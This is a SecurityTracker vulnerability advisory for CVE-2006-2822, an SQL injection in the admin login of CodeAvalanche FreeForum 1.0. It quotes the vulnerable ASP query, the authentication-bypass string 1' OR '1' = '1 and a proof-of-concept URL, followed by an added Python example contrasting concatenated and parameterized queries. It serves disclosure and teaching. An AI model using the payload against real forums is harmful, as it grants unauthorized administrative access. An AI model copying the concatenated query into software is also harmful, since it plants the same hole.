SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   CodeAvalanche FreeForum
Vendors:   CodeAvalanche
CodeAvalanche FreeForum Input Validation Hole Permits SQL Injection Attacks
SecurityTracker Alert ID:  1016212
SecurityTracker URL:  http://securitytracker.com/id/1016212
CVE Reference:   CVE-2006-2822
Updated:  May 22 2009
Original Entry Date:  Jun 2 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.0
Description:   A vulnerability was reported in CodeAvalanche FreeForum. A remote user can inject SQL commands.

The 'admin/default.asp' script does not properly validate user-supplied input in the 'password' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. This can be exploited to gain administrative access to the target application.

A demonstration exploit URL is provided:

http://[target]/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1

omnipresent discovered this vulnerability.

The original advisory is available at:

http://colander.altervista.org/advisory/CAForum.txt

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.truecontent.info/codeavalanche/asp-forum-script.php
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  CA Forum Remote SQL Injection

------------------------------------------------------------------

               - CAForum 1.0 Remote SQL Injection -

   -= http://colander.altervista.org/advisory/CAForum.txt =-

------------------------------------------------------------------


	    -= CodeAvalanche Forum Version 1.0 =-

Omnipresent
June 01, 2006

Vulnerability(s):
----------------
SQL Injection




Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php



Description of product:
-----------------------
CodeAvalanche FreeForum is an ASP forum application which allows free posting; there is no need for registration of your visitors. The administrator can add an unlimited number of forum categories.



Vulnerability / Exploit:
------------------------

The file default.asp in the Admin directory is vulnerable to a remote SQL injection attack.
A malicious person can gain admin rights by putting the right parameters in the Password variable.

Let's check the source code:

<% Response.Buffer = True

userLogged=false
If Request("Password")<>"" Then
'response.Write(Request("Password"))
'response.flush

dim rsUser,selectSQL
' Request("Password") is concatenated directly into the SQL text
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"

[...]

[End default.asp]

As you can see, the variable Password is not properly sanitized before being used, so an attacker can put this string in the password field:

1' OR '1' = '1

So, the query will be:

selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'"

And you can gain access to the application with admin rights.



PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple Proof Of Concept used on my local machine:

http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1



Vendor Status
-------------
Not informed!

Credits:
--------
omnipresent

omnipresent@email.it
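
The concatenated query from default.asp next to a parameterized form, as an added example (not code from the advisory or from CodeAvalanche). Python with an in-memory SQLite table stands in for the ASP page and its database; the table contents, function names and sample password are constructed for illustration.

```python
import sqlite3


def make_db(admin_password="s3cret-admin"):
    """Constructed stand-in for the forum's PARAMS table (real schema not on the page)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE PARAMS (PASSWORD TEXT)")
    db.execute("INSERT INTO PARAMS (PASSWORD) VALUES (?)", (admin_password,))
    return db


def built_query(password):
    """Same string construction as the selectSQL line in default.asp."""
    return "SELECT * FROM PARAMS where PASSWORD='" + password + "'"


def login_concatenated(db, password):
    """Vulnerable form: the submitted value becomes part of the SQL text."""
    return db.execute(built_query(password)).fetchone() is not None


def login_parameterized(db, password):
    """Hardened form: the value is bound as data and is never parsed as SQL."""
    row = db.execute("SELECT * FROM PARAMS WHERE PASSWORD = ?", (password,)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    # Wrong password, correct password, and the string quoted in the advisory.
    for candidate in ("wrong", "s3cret-admin", "1' OR '1' = '1"):
        print(
            repr(candidate),
            "concatenated:", login_concatenated(db, candidate),
            "parameterized:", login_parameterized(db, candidate),
        )
```

With the bound parameter, a password containing a single quote is compared as an ordinary string instead of changing the statement or raising a syntax error.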

 
 

